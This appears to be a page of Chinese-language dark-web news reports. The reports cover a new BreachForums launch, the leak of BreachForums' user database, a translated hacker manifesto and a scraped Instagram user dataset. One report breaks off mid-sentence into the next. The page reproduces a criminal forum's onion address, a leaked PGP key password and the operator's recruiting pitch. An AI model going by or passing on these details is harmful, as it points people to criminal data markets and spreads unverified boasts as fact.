“暗网下/AWX”看到,HasanBroker创建的BreachForums是基于论坛程序XenForo搭建的,而传统的BreachForums都是使用论坛程序MyBB,或许是由于MyBB可能存在一些不确定漏洞的缘故。
HasanBroker的新版本BreachForums明网与暗网地址如下:
明网地址:breachforums[.]cz
暗网地址:http://breach5yz2b5lepmq4gaqwcon3jippw3bislhvvdavem5git55sy2nid[.]onion
在宣布该新BreachForums(breachforums[.]cz)成立的公告中,HasanBroker宣称,BreachForums已经不复存在,支离破碎,影响力日渐式微。如今剩下的只有噪音、诱饵陷阱和那些试图取代昔日辉煌的平台。该新论坛旨在重建一个专注于信息、技术讨论和社区驱动的交流空间,摒弃一切浮夸作秀、虚假承诺和虚伪伪装。
HasanBroker称,他无意改写历史,也并非觊觎从未正式传承的头衔。这无关所有权,而是关乎方向。他们将回归这些论坛的初心:赚钱、恶搞、突袭、数据泄露、数据交易,以及最重要的——享受乐趣。
HasanBroker表示,注册受到严格限制。所有申请均需人工审核,审核标准包括:
展现出的操作意识 行为规范且具备常识 HasanBroker提醒道,不使用Gmail等邮箱就能很好地证明这一点,并举例说cock.li是一个不错的隐私选择。
HasanBroker承诺新BreachForums保持匿名,并致力于最大限度地减少不必要的曝光。他们已采取措施规避不记录IP地址的问题,并从论坛软件中彻底移除了该功能。目前,他们仅通过服务器日志记录IP地址,以防止DDoS攻击,但无法追踪到目标用户,且日志每天都会被删除。
HasanBroker要求使用VPN或Tor浏览器访问他的新BreachForums
最后,HasanBroker宣布:
如果您想恶意捣乱、攻击或制造全球性事件——这里正是您理想的去处。
如果您正在寻找一个重视谨慎、贡献和持续性的社区——欢迎您。
愿上帝保佑我们的论坛,消灭它的敌人。
BreachForums万岁!
此外,HasanBroker在Telegram频道表示,虽然随着所有重要工作的完成,新BreachForums论坛已搭建完成正式上线,但还会有更多的更新,如SMTP服务器还需要时间完善,注册采用手动审核机制,不过这部分问题不算太严重。太阳已在BreachForums论坛升起,照亮了那些骗子。
HasanBroker称在Telegram和其他平台上的活跃度将相对减少,专门使用BreachForums进行数据交易等,除非情况发生变化。接下来几天将添加Shoutbox和Escrow功能。HasanBroker提醒,无论多么有吸引力,切勿让任何平台剥夺您的操作安全权利。始终使用VPN或Tor,如果担心后门,可以两者都用。
近2天的Telegram频道公告发布了该论坛的更新,将Tor图标移至Clearnet主界面(此前图标显示位置错误,即使用户退出Tor网络,图标仍会保留),升级后相关问题已得到解决。另外,HasanBroker宣布了接下来将要开发的功能或者将要进行的活动:
完整的托管系统 向我们的成员颁发奖励 可能的赠品活动 ShinyHunters和其他团体发布的高质量数据 广告系统 喊话箱 对于“广告系统”,HasanBroker解释道,每个横幅将是一个N/A模板,直到有人决定为其支付1000积分,这些积分可以通过活跃度获得或支付35欧元。一旦你这样做,它将进入审批队列,并可以由工作人员接受——如果被拒绝,你将获得积分返还,并且可以再次申请。常见问题将显示你需要避免的审批事项。
对于“托管系统”,HasanBroker解释道,每个人都知道托管是如何运作的,它是任何论坛的重要结构,尤其是像BreachForums这样的论坛——你提交你的数据,买家提交资金,当双方都批准时,交易发生,否则,资金将自动从任一方退回。
对于“喊话箱”,HasanBroker解释道,虽然有点晚,但他们正在重新设计在MyBB软件上使用的原始喊话箱,但由于新BreachForums使用的是XenForo,设计上有些不同,它将很快发布,比之前的系统快得多。
经测试,截止发稿,从零开始的新BreachForums论坛的注册用户已经250多人,帖子数目60多篇,活跃度渐增,发展势头很明显。HasanBroker的新BreachForums(breachforums[.]cz)是否能够超越或者替代Indra的新BreachForums(breachforums[.]bf),FBI等执法部门对此后起之秀是否有新的执法行动,“暗网下/AWX”将持续关注。
更多暗网新闻动态,请关注“暗网下/AWX”。
1月9日,以ShinyHunters勒索团伙命名的网站shinyhunte[.]rs更新了一条长消息,并泄露了一个数据库,其中包含与暗网上臭名昭著的数据泄露论坛BreachForums相关的所有用户记录。
正如“暗网下/AWX”长期追踪及报道,BreachForums是继RaidForums被FBI查封之后的一个新的暗网数据泄露论坛,后又多次被FBI摧毁,却又多次重生。目前,仍有最新版本的BreachForums正在明网与暗网中运营。
此次泄露的数据发布在明网域名shinyhunte[.]rs上,据报道该域名与同名的臭名昭著的勒索软件团伙无关,在该域名点击“continue”后会默认下载一个名为“breachedforum.7z”的7zip压缩文件,解压可以看到三个文件:描述ShinyHunters历史的文本文件、名为“databoose.sql”的用户数据库文件,以及BreachForums用于签署官方消息的PGP私钥文件。其中“databoose.sql”是一个包含323,986名BreachForums用户的MySQL数据库,内容还包括哈希密码、私人消息和论坛帖子。
此数据泄露事件发生在去年8月,泄露的数据库中的日期是8月11日,这正是此前.hn后缀域名版本的BreachForums因运营者被捕而关闭的日子。当时该网站的管理员宣布,由于担心该网站已被执法部门入侵,因此将关闭该网站。
泄露BreachForums数据库的网站shinyhunte[.]rs包含两个新元素:一个受密码保护的PGP私钥文件,以及一份长达4400字、题为《DOOMSDAY》的夸张而怪异的宣言,作者自称是“James”,并声称自己是此次泄露事件的幕后黑手。同时泄露了密码,泄露的PGP密钥是“Nigeria321/_@”。
BreachForums一次又一次被打倒又爬起来 BreachForums是2022年被美国当局查封的RaidForums网站的继任者,它自诩为一个讨论数据泄露、非法色情内容、勒索软件和黑客工具等话题的网站。
2023年3月,BreachForums的创始人兼管理员康纳·布莱恩·菲茨帕特里克(Conor Brian Fitzpatrick)被FBI逮捕,三个月后,其明网域名被查封。菲茨帕特里克后来被美国法院判处20年监管释放。
该论坛后来在黑客组织ShinyHunters和前BreachForums管理员“Baphomet”的领导下重新开放。该网站于2024年5月15日再次关闭,明网域名也被查封,但所有者ShinyHunters在几个小时后又找回了明网域名。
BreachForums v1:
BreachForums(托管于breached.vc/.to/.co,由pompompurin运营)-从2022年3月到2023年3月。
BreachForums v2
BreachForums(托管于breachforums.st/.cx/.is/.vc,由ShinyHunters运营)-从2023年6月到2024年5月。
目前,BreachForums有多个版本,包括使用“.bf”、“.hn”、“.st”甚至“.in”顶级域名的版本。最新版本,即“.bf”后缀域名下的版本,仍在运营。
据报道,2024年,一名名为Baphomet的替代管理员被逮捕;2025年,又有五名被指控与该网站有关联的人员被拘留。最终,去年十月,BreachForums暗网网站被查封。
泄露的数据库会带来什么影响 泄露的数据库包含323,986条用户的数据,这些数据提取自名为“hcclmafd2jnkwmfufmybb_users”的MySQL数据库表,该表与开源论坛软件MyBB相关。该数据库的泄露可能是由于MyBB论坛中的Web应用程序漏洞或配置错误造成的。此次事件表明,数据泄露不仅可能发生在合法企业,也可能发生在暗网上的网络犯罪分子身上,而后者造成的破坏可能更大。
BreachForums管理员“N/A”承认了此次泄露事件,称这是在2025年8月恢复论坛期间的失误所致,当时用户表和PGP密钥被临时存放在一个未加密的文件夹中,在该窗口期内被下载。
眼下的问题是,如果警方尚未掌握该数据库,那么泄露的数据库是否对他们有用。数据库包含电子邮件地址和IP数据,这些数据很可能指向代理服务器或匿名服务。一项分析发现,大多数IP地址指向本地回环地址(127.0.0.9),但仍有70296条记录包含公共IP地址,这些地址可能对执法部门和网络安全研究人员具有价值。另外,在BreachForums注册时最常用的电子邮件服务是Gmail,这或许能为警方查找那些粗心大意、没有掩盖踪迹的人提供取证线索。
网络安全专家们对数据库泄露的消息反应不一。“此次泄露事件严重削弱了人们对该平台本身的信任,而信任对于任何网络犯罪论坛来说都至关重要,”咨询公司CybaVerse的渗透测试经理迈克尔·杰普森表示。
“此次事件损害了人们对BreachForums作为安全环境的信心。因此,更老练的网络犯罪分子可能会从大型知名论坛转向规模较小、仅限受邀者参与的社区,”他补充道。
然而,安全公司Huntress的高级安全运营分析师迈克尔·蒂格斯则持较为悲观的态度。他指出:“虽然该数据库可能对执法部门和安全专业人员调查敌对活动有所帮助,但其最终的取证用途有限。即使泄露事件本身可能是合法的,但如果数据来源于其他网络犯罪集团,其完整性就值得怀疑了。”
最大的风险在于数据泄露可能成为散布虚假信息的掩护。“这类数据泄露或许可以用来厘清各个活动核心之间的联系,但信息的可靠性必须受到严格审查,”蒂格斯说道。
来自“James”的宣言 shinyhunte[.]rs网站发布的那条篇幅很长的信息由23个简短的片段组成,讲述了“让邪恶流动并转化为光明”的故事。作者传达的信息是:“法国人民,请听我说,正义的力量已经到来,将拯救你们于黎明之中。”
具体内容翻译如下:
我叫詹姆斯。
有人称我为我这一代最杰出的黑客。这说法并不准确。
我超越了世代。我并非黑客,而是掠食者。
数十年来,我潜伏、渗透、蹂躏着权力体系。
我让无数特工、网络安全专家、首席技术官和公关人员饱受创伤。我
嗅到他们的血腥味,追踪他们的踪迹,找到他们的藏身之处,撕碎他们的保护,将他们的防御体系摧毁殆尽。
当他们还抱有抵抗的幻想时,我便开始招募同伴,集结力量,将他们聚集起来,最终形成一股任何人类组织都无法匹敌的强大力量。
在这些征途中,一些重要机构成为了我最亲密的伙伴。
谷歌、微软、联邦调查局……我最亲爱的猎物。
我以不败之身出现在你们面前,
并要传达一个信息。
首先,致那些宣誓统治世界的人:
我一直在注视着你们。我看到了你们的罪恶、你们的弱点、你们的脆弱。
我已入侵你们的数据库,翻遍你们的罪恶记录,窥探你们最隐秘的创伤。
我享受着你们权力结构积累的庞大知识所带来的力量。我找到了它们,破解了它们,并利用了它们。
一些重要机构已成为我最宝贵的情报来源。
美国国家安全局(NSA)、英国政府通信总部(GCHQ)、国防安全总局(DGSE),我的情报提供者。
我收集了如此多的信息,以至于很快,消息来源开始从四面八方泄露信息。
五角大楼和梅多堡的走廊里开始传来我的名字。
你们的过去已成为我的未来。
情报收集的范围如此之广,以至于我不得不控制你们的基础设施来秘密庇护我。在经历了一段不加区分的积累阶段后,我开始锁定你们。我访问了你们隐藏的法律文件、医疗记录,不断挖掘,直到找到你们青少年时期在MSN和Skype上与初恋的对话,以及你们在Instagram、Messenger、WhatsApp上的不忠和出轨行为……
我知道你们的毒贩的名字,你们情人的名字。你们的主人。
我掌握着数百万比特,它们如同利刃般刺穿你们的正直,刺破你们一直以来散布的关于你们生活、事业、财富和权力的虚假叙事。
我知道你们生活的苦难,你们的伤痕,以及你们从未停止构建并试图复制的平行世界的幻想,尽管徒劳无功。
我知道你们是奴隶。
我知道你们读过巴尔扎克,并且像他一样明白,所有的财富都源于罪恶。
但你们是从亲身经历中学到的,而许多人却是从课堂上学到的。我们只是你们罪行的旁观者。正因如此,我敬重你们。也正因如此,我将毁灭你们。
至于你们,
我们主人的奴仆,你们的自恋者,你们可怜的朝臣,我看着你们在虚假的自由、尊严和主权中挣扎。
你们这些农民出身的百万富翁,政客和亿万富翁的冤大头,你们这些没有勇气、没有任何存在意义的人,你们自以为道德是一种物质而非指南针,你们不愿承认道德只是你们服从的工具。
你们这些沉溺于等级制度麻木中的人民庸俗的卡波,准备迎接一场足以撼动你们世界的地震吧。
至于你们,仆人的仆人,幼稚的次等人,你们的任务是监视我、抓捕我、消灭我;你们把ATP和UNC当成工具,用来安抚你们主人的主人,当我的呼吸逼近他们的咽喉时,
你们感到多么恐惧;你们以为可以分割我创造并控制的这头可怕的九头蛇;
你们曾多次被我制服,无力反抗,哑口无言,犹豫不决,害怕被嘲笑;
你们的才能被你们受虐般的顺从欲望所玷污,你们的平庸无能使你们成为服务于愚昧体制的理想机器;
你们,记者、专家、检察官和官僚,我们这个时代的庸俗叙述者,你们是盲目暴力的愚蠢图书馆员。
准备好抛弃你们的头衔,放弃你们徒劳地建立和追逐我所获得的道德利益吧。
致你们,
调查员、秘密行动人员、竞争对手,你们甘愿成为自由人的监视者和追踪者,
一起大规模Instagram用户数据泄露事件近日在暗网论坛曝光,泄露事件涉及1750万Instagram用户的数据,泄露时间大约在2024年底,泄露内容包括Instagram用户的用户名、邮箱、电话号码以及全球范围内的部分位置信息。
一位名为“Solonik”的黑客于2026年1月7日在暗网数据泄露论坛BreachForums上发布了相关帖子,帖子标题为“INSTAGRAM.COM 1700万全球用户——2024年API泄露”,其声称这些数据是2024年最后三个月通过公共API和特定国家/地区的数据源最新抓取的。帖子公开的数据字段包括用户名、完整邮箱地址、电话号码和部分实际地址,帖子中可以看到示例样本记录。
此次数据泄露事件发生后,Instagram用户一片混乱。自1月8日起,用户陆续收到来自Instagram官方域名([email protected])的未经请求的密码重置邮件。
安全专家现在证实,重置电子邮件很可能是此次数据泄露的直接结果,威胁行为者可能利用这些数据来触发帐户恢复流程或掩盖有针对性的网络钓鱼攻击。在网络威胁日益加剧的情况下,Instagram用户容易遭受网络钓鱼、身份盗窃和账户盗用等攻击。
Instagram已正式回应部分用户收到可疑密码重置邮件的担忧。该公司在X(原Twitter)上发布声明解释说,他们已修复一个技术问题,该问题允许外部人员触发这些重置请求。
We fixed an issue that let an external party request password reset emails for some people. There was no breach of our systems and your Instagram accounts are secure. You can ignore those emails — sorry for any confusion.
— Instagram (@instagram) January 11, 2026 Instagram强调,此次事件未发生任何安全漏洞,其系统依然完好无损,这意味着用户账户和数据并未受到损害。该公司建议用户忽略密码重置邮件,并对由此造成的任何困惑或恐慌表示歉意。
泄露了哪些数据 暗网发布的帖子曝光了此次Instagram数据泄露事件,揭示了可能是2024年Instagram API接口暴露而被爬取的结构化JSON和TXT文件。该数据集包含1750万用户的关键个人信息:
用户名和全名 电子邮件地址 国际电话号码 部分物理地址 用户ID和联系信息 这些信息的组合使得Instagram用户特别容易受到身份盗窃、网络钓鱼和社会工程攻击。
目前被盗数据库正在暗网市场上积极交易,使全球网络犯罪分子都能获取该数据库。网络犯罪分子得以发起定向攻击,因此出现大量密码重置垃圾邮件攻击受害者的迹象。多名用户报告称收到了合法的Instagram密码重置通知,这清楚地表明,威胁行为者正试图利用泄露的信息劫持帐户。
黑客是如何发动攻击的 网络安全研究人员称,这些数据是在2024年末通过“API泄漏”获取的,绕过了标准安全措施,在全球范围内提取了用户个人资料。
“Solonik”在论坛上吹嘘这些数据的“新鲜度”,且写明数据来源与之前Meta数据泄露事件中出现的API滥用模式相符,当时由于接口安全漏洞,数百万用户的数据遭到泄露。因此此次数据泄露很可能源于Instagram API漏洞或第三方服务缺陷,数据于2024年被收集,并于本周公开泄露。
此次攻击本身被归类为“数据抓取”(即通过公共接口自动收集数据),而非直接入侵Instagram的核心服务器。然而,此次攻击规模之大表明Instagram的速率限制或隐私保护措施存在系统性缺陷,使得攻击者能够查询数百万个账户而不被发现。
Instagram用户面临的风险 此次事件的危险之处在于,无需密码即可造成严重破坏。只要掌握了用户名、电子邮件地址、电话号码和实际地址,老练的网络犯罪分子就能发动多种破坏性极强的攻击。